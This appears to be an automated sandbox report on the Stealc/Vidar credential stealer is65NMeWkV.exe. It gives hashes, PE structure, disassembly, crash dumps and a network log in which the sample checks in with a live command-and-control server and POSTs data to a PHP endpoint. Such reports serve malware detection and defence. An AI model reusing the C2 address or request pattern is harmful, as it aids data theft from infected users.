                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • VT rate limit hit for: is65NMeWkV.exe
                                    TimeTypeDescription
                                    09:57:19API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    109.107.157.208T220UXIoKO.exeGet hashmaliciousStealc, VidarBrowse
                                    • 109.107.157.208/49aaa1bd4c594849.php
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPLT220UXIoKO.exeGet hashmaliciousStealc, VidarBrowse
                                    • 109.107.157.208
                                    arm5.elfGet hashmaliciousUnknownBrowse
                                    • 178.235.230.100
                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                    • 178.235.82.120
                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                    • 78.88.71.211
                                    jade.x86.elfGet hashmaliciousMiraiBrowse
                                    • 95.160.85.220
                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                    • 78.88.9.121
                                    nuklear.arm.elfGet hashmaliciousUnknownBrowse
                                    • 93.105.146.207
                                    eLSH927bGM.elfGet hashmaliciousUnknownBrowse
                                    • 93.105.146.209
                                    na.elfGet hashmaliciousMiraiBrowse
                                    • 93.105.223.164
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 88.156.92.211
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.9711660713636462
                                    Encrypted:false
                                    SSDEEP:96:nv/49EeKZbn7sFChsow7Rr6tQXIDcQnc6MHcE0cw3w+HbHg/PB6HeaOy1EaGHh4B:vhVb7q0JC+NjGcZrP2izuiF6Z24IO8C
                                    MD5:4BACBEC4411EFCECD84120FBB3A98DAA
                                    SHA1:519EFD6DEBD96B1D9574295DFDE5938B4AF6B165
                                    SHA-256:73655ACB3D61F59044F0E3029441476B45A17DE44A445F1883C4A41496E561D1
                                    SHA-512:4257227EF0470CA7C70C54F18A27EF926447356E6C9D32BA61179BCBB741AACD665CB45DF7DC7536F14AE5E49C6CA7E0AFF787B694E37BEED7B702B128DEF844
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.2.5.1.8.2.2.1.1.4.4.6.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.2.5.1.8.2.2.5.2.0.7.2.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.4.7.b.e.d.7.-.3.9.6.4.-.4.8.8.3.-.8.5.6.a.-.4.3.a.a.2.4.a.4.b.f.d.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.1.6.0.8.9.1.-.8.f.6.e.-.4.f.9.0.-.9.1.5.b.-.5.1.b.d.2.3.b.f.5.0.7.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.s.6.5.N.M.e.W.k.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.0.8.-.0.0.0.1.-.0.0.1.4.-.5.2.c.7.-.7.b.9.8.1.c.2.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.4.b.9.a.5.2.0.7.9.6.b.d.6.f.1.f.2.c.d.c.0.6.6.7.9.0.c.f.d.b.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.0.b.9.f.7.0.6.0.c.d.7.e.8.5.7.d.5.3.a.7.4.0.e.7.e.0.2.5.d.4.d.7.5.f.7.a.b.2.7.!.i.s.6.5.N.M.e.W.k.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Thu Oct 24 13:57:02 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):63484
                                    Entropy (8bit):1.8882490483185832
                                    Encrypted:false
                                    SSDEEP:192:du9cwXMnHR9XtOQOJwLzM8uR1Ec1+NHtd19UWu4jqJbcBc3GkfKdW3njzbZY1N8b:8WnHRaQEOMDRX+dEnDG5o3jq1Krf
                                    MD5:26BE34AFEC5462A9B9F71E5262BB44A2
                                    SHA1:4B56B64BE1C7A42C9D7393E2D6B88CF99E3902F5
                                    SHA-256:C3EBC87FF978F62384EEF7A551FDEAF538B2205A7C37C6BF04DF89EA743754E4
                                    SHA-512:AEF508B83C979203C3F52C11CCBBD7A904B7A97BF2F655AAF40B610C093428EEF4EECE629030FF020046F96EE04A0B0022D8D1BDBCECEA2DA101750E01FD2CF3
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... ........R.g............4...............<............*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T...........+R.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8432
                                    Entropy (8bit):3.6988034988737195
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJkz6Vs6Y9fSUXCiDgmfcwpD089bzKsf9xm:R6lXJA6Vs6YlSUXCegmfcMzpfi
                                    MD5:B5052E5874E09AE2FFEC446E4ED1C2D8
                                    SHA1:5DF8E3D2522B9758266F899BAE208FA33E048C68
                                    SHA-256:C980724D11A6B31F6986398FB6E0CFE36392BBADF6E22F0E3DFEC70F6C9FA2D9
                                    SHA-512:8EBD8A038F2383562D177B3B585D4A0452E7DF79D07E82857765461B86D855FA56A3A7C602BE2752FD99CA61AA083FDF00E08B6710FFE5F41BFEDF1F285DA41B
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.<./.P.i.d.>...
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4724
                                    Entropy (8bit):4.483742601969905
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsoJg77aI9J2WpW8VYcYm8M4JwkCO3FT+q8vqkCOw2xQkSad:uIjfuI7DX7V4J0mKWExPSad
                                    MD5:29D91479A7CBA0F431FF5DD830A899EC
                                    SHA1:8C825FD5AAFFA0D0EC2E4798077183CBE0AA8023
                                    SHA-256:A1DE463908353A5AD5A4A022EF8300CFFCCA1E6711408BB316BDEFBA600B06E3
                                    SHA-512:BEADAE37C80551EF2AAFC30641F264BE868BC50BC335EEB12A0CEF9DC165BE0FBE4E80A2D72DE76DCD4D8B9C53C1889A284ED04D9A668FB5E6AB85B45BBB15C5
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="557579" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.465440078752722
                                    Encrypted:false
                                    SSDEEP:6144:5IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbk:KXD94+WlLZMM6YFHB+k
                                    MD5:846BD9A4A292F1BE5FCCDC3CF9305EC5
                                    SHA1:E515783AB9766F02FA0F96D4A8D433A290DB244B
                                    SHA-256:83A2DC0617DCE8D32F8B62E771A82B8B53E7F4EC81CF03847ABD0220C763EB21
                                    SHA-512:596D7C5881D41F40234F199D27AF64E16B5FF6B971E3F8C1762CBBAF7BD91697B5B6C74DD8A8B574A42FC05EB09398E1753448A152F6CFB6F12C233C981B4EEE
                                    Malicious:false
                                    Reputation:low
                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ...&...............................................................................................................................................................................................................................................................................................................................................v.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.4431888700013955
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:is65NMeWkV.exe
                                    File size:399'360 bytes
                                    MD5:5d0d37171e8ed9fc0b97e8f858133802
                                    SHA1:f0b9f7060cd7e857d53a740e7e025d4d75f7ab27
                                    SHA256:0d90d3771d5a6c15760e18a6f2a542076d7c7c73c02d31c33dfee2f6f7bed61c
                                    SHA512:fd1b7e887f9c27394d365f01be42132ecfb94970e8daf732fba249b2371123adfc718c6e277f34c759cac8c8ab08dd093ec396cedaad18d290cac2b1477b0e14
                                    SSDEEP:6144:e9LX/SNfdnuHt939e/pA6NoQmdbZKYJncY4dlxnc0rjuVH/kWTW:GEfRuN934//oQmBZf5Qldc8juJj
                                    TLSH:C984F15436A0F471C5520D304C28C7F8A93FB832DA69994B771C7F5F3D3A392AA66706
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z...Z...Z...D...z...D...B...D.......}3.._...Z...'...D...[...D...[...D...[...RichZ...................PE..L......e...........
                                    Icon Hash:63796de971636e0f
                                    Entrypoint:0x403a18
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x65DDD6F9 [Tue Feb 27 12:35:05 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:60292dd185c67d0ddd8dc10e8ecfb2bb
                                    Instruction
                                    call 00007FEBA4943B79h
                                    jmp 00007FEBA493F39Eh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    call 00007FEBA493F55Ch
                                    xchg cl, ch
                                    jmp 00007FEBA493F544h
                                    call 00007FEBA493F553h
                                    fxch st(0), st(1)
                                    jmp 00007FEBA493F53Bh
                                    fabs
                                    fld1
                                    mov ch, cl
                                    xor cl, cl
                                    jmp 00007FEBA493F531h
                                    mov byte ptr [ebp-00000090h], FFFFFFFEh
                                    fabs
                                    fxch st(0), st(1)
                                    fabs
                                    fxch st(0), st(1)
                                    fpatan
                                    or cl, cl
                                    je 00007FEBA493F526h
                                    fldpi
                                    fsubrp st(1), st(0)
                                    or ch, ch
                                    je 00007FEBA493F524h
                                    fchs
                                    ret
                                    fabs
                                    fld st(0), st(0)
                                    fld st(0), st(0)
                                    fld1
                                    fsubrp st(1), st(0)
                                    fxch st(0), st(1)
                                    fld1
                                    faddp st(1), st(0)
                                    fmulp st(1), st(0)
                                    ftst
                                    wait
                                    fstsw word ptr [ebp-000000A0h]
                                    wait
                                    test byte ptr [ebp-0000009Fh], 00000001h
                                    jne 00007FEBA493F527h
                                    xor ch, ch
                                    fsqrt
                                    ret
                                    pop eax
                                    jmp 00007FEBA4943D3Fh
                                    fstp st(0)
                                    fld tbyte ptr [004497EAh]
                                    ret
                                    fstp st(0)
                                    or cl, cl
                                    je 00007FEBA493F52Dh
                                    fstp st(0)
                                    fldpi
                                    or ch, ch
                                    je 00007FEBA493F524h
                                    fchs
                                    ret
                                    fstp st(0)
                                    fldz
                                    or ch, ch
                                    je 00007FEBA493F519h
                                    fchs
                                    ret
                                    fstp st(0)
                                    jmp 00007FEBA4943D15h
                                    fstp st(0)
                                    mov cl, ch
                                    jmp 00007FEBA493F522h
                                    call 00007FEBA493F4EEh
                                    jmp 00007FEBA4943D20h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    Programming Language:
                                    • [C++] VS2008 build 21022
                                    • [ASM] VS2008 build 21022
                                    • [ C ] VS2008 build 21022
                                    • [IMP] VS2005 build 50727
                                    • [RES] VS2008 build 21022
                                    • [LNK] VS2008 build 21022
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4772c0x3c.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5b0000x12b58.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25f0000xa48.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26900x40.text
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x4708c0x47200372844af899a298d533027599ff622cfFalse0.7336816234622144data7.012763407505116IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .data0x490000x1185c0x6000658aeadd60814ab08f977223f9ee6724False0.0777587890625Matlab v4 mat-file (little endian) n2, sparse, rows 0, columns 00.9052237577489807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x5b0000x203b580x12c005925f1e123334200b740411e63c143d8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x25f0000x14be0x1600d7eeaff98ac8f72dfe52e310f9c3ae34False0.4055397727272727data3.973364894187828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    XUBONAVEGUCIZAKUFAMABAWADUJATA0x651300x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5879156423858196
                                    XUBONAVEGUCIZAKUFAMABAWADUJATA0x651300x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5879156423858196
                                    RT_CURSOR0x66fc00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                    RT_CURSOR0x67e680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                    RT_CURSOR0x687100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                    RT_CURSOR0x68ca80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                    RT_CURSOR0x68dd80xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                    RT_CURSOR0x68eb00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                    RT_CURSOR0x69d580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                    RT_CURSOR0x6a6000x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                    RT_CURSOR0x6ab980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                    RT_CURSOR0x6ba400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                    RT_CURSOR0x6c2e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                    RT_ICON0x5b7f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.532258064516129
                                    RT_ICON0x5b7f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.532258064516129
                                    RT_ICON0x5beb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4107883817427386
                                    RT_ICON0x5beb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4107883817427386
                                    RT_ICON0x5e4600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4441489361702128
                                    RT_ICON0x5e4600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4441489361702128
                                    RT_ICON0x5e8f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.36886993603411516
                                    RT_ICON0x5e8f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.36886993603411516
                                    RT_ICON0x5f7a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5130866425992779
                                    RT_ICON0x5f7a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5130866425992779
                                    RT_ICON0x600480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5841013824884793
                                    RT_ICON0x600480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5841013824884793
                                    RT_ICON0x607100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6502890173410405
                                    RT_ICON0x607100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6502890173410405
                                    RT_ICON0x60c780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.462448132780083
                                    RT_ICON0x60c780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.462448132780083
                                    RT_ICON0x632200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.475375234521576
                                    RT_ICON0x632200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.475375234521576
                                    RT_ICON0x642c80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.45778688524590166
                                    RT_ICON0x642c80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.45778688524590166
                                    RT_ICON0x64c500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5106382978723404
                                    RT_ICON0x64c500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5106382978723404
                                    RT_DIALOG0x6cad80x58data0.8977272727272727
                                    RT_STRING0x6cb300x374dataTamilIndia0.46945701357466063
                                    RT_STRING0x6cb300x374dataTamilSri Lanka0.46945701357466063
                                    RT_STRING0x6cea80x2aedataTamilIndia0.478134110787172
                                    RT_STRING0x6cea80x2aedataTamilSri Lanka0.478134110787172
                                    RT_STRING0x6d1580x4e8dataTamilIndia0.4434713375796178
                                    RT_STRING0x6d1580x4e8dataTamilSri Lanka0.4434713375796178
                                    RT_STRING0x6d6400x514dataTamilIndia0.4276923076923077
                                    RT_STRING0x6d6400x514dataTamilSri Lanka0.4276923076923077
                                    RT_ACCELERATOR0x66f680x58dataTamilIndia0.7954545454545454
                                    RT_ACCELERATOR0x66f680x58dataTamilSri Lanka0.7954545454545454
                                    RT_GROUP_CURSOR0x68c780x30data0.9375
                                    RT_GROUP_CURSOR0x68e880x22data1.0588235294117647
                                    RT_GROUP_CURSOR0x6ab680x30data0.9375
                                    RT_GROUP_CURSOR0x6c8500x30data0.9375
                                    RT_GROUP_ICON0x5e8c80x30dataTamilIndia0.9375
                                    RT_GROUP_ICON0x5e8c80x30dataTamilSri Lanka0.9375
                                    RT_GROUP_ICON0x650b80x76dataTamilIndia0.6694915254237288
                                    RT_GROUP_ICON0x650b80x76dataTamilSri Lanka0.6694915254237288
                                    RT_VERSION0x6c8800x254data0.535234899328859
                                    DLLImport
                                    KERNEL32.dllGlobalCompact, CreateProcessW, InterlockedIncrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, SetComputerNameW, SetVolumeMountPointW, GetComputerNameW, GetTickCount, GetCommConfig, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsW, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, ReadConsoleInputA, GetVersionExW, GetFileAttributesA, GlobalMemoryStatus, GetModuleFileNameW, GetShortPathNameA, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, CreateNamedPipeA, SetFileAttributesA, LoadLibraryA, GetNumberFormatW, OpenJobObjectW, SetEnvironmentVariableA, GetCurrentDirectoryA, OpenEventW, LCMapStringW, CommConfigDialogW, GetTimeFormatW, GetTempFileNameW, HeapAlloc, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                    GDI32.dllGetCharWidth32A
                                    Language of compilation systemCountry where language is spokenMap
                                    TamilIndia
                                    TamilSri Lanka
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-24T15:57:02.114246+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730109.107.157.20880TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 24, 2024 15:57:01.002331972 CEST4973080192.168.2.4109.107.157.208
                                    Oct 24, 2024 15:57:01.008313894 CEST8049730109.107.157.208192.168.2.4
                                    Oct 24, 2024 15:57:01.008466959 CEST4973080192.168.2.4109.107.157.208
                                    Oct 24, 2024 15:57:01.008663893 CEST4973080192.168.2.4109.107.157.208
                                    Oct 24, 2024 15:57:01.015043020 CEST8049730109.107.157.208192.168.2.4
                                    Oct 24, 2024 15:57:01.837510109 CEST8049730109.107.157.208192.168.2.4
                                    Oct 24, 2024 15:57:01.837606907 CEST4973080192.168.2.4109.107.157.208
                                    Oct 24, 2024 15:57:01.869196892 CEST4973080192.168.2.4109.107.157.208
                                    Oct 24, 2024 15:57:01.874923944 CEST8049730109.107.157.208192.168.2.4
                                    Oct 24, 2024 15:57:02.114142895 CEST8049730109.107.157.208192.168.2.4
                                    Oct 24, 2024 15:57:02.114245892 CEST4973080192.168.2.4109.107.157.208
                                    Oct 24, 2024 15:57:07.489281893 CEST8049730109.107.157.208192.168.2.4
                                    Oct 24, 2024 15:57:07.489382029 CEST8049730109.107.157.208192.168.2.4
                                    Oct 24, 2024 15:57:07.489474058 CEST4973080192.168.2.4109.107.157.208
                                    Oct 24, 2024 15:57:07.489475012 CEST4973080192.168.2.4109.107.157.208
                                    Oct 24, 2024 15:57:21.535186052 CEST4973080192.168.2.4109.107.157.208
                                    • 109.107.157.208
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730109.107.157.208808C:\Users\user\Desktop\is65NMeWkV.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 24, 2024 15:57:01.008663893 CEST90OUTGET / HTTP/1.1
                                    Host: 109.107.157.208
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Oct 24, 2024 15:57:01.837510109 CEST203INHTTP/1.1 200 OK
                                    Date: Thu, 24 Oct 2024 13:57:01 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 24, 2024 15:57:01.869196892 CEST419OUTPOST /49aaa1bd4c594849.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG
                                    Host: 109.107.157.208
                                    Content-Length: 217
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
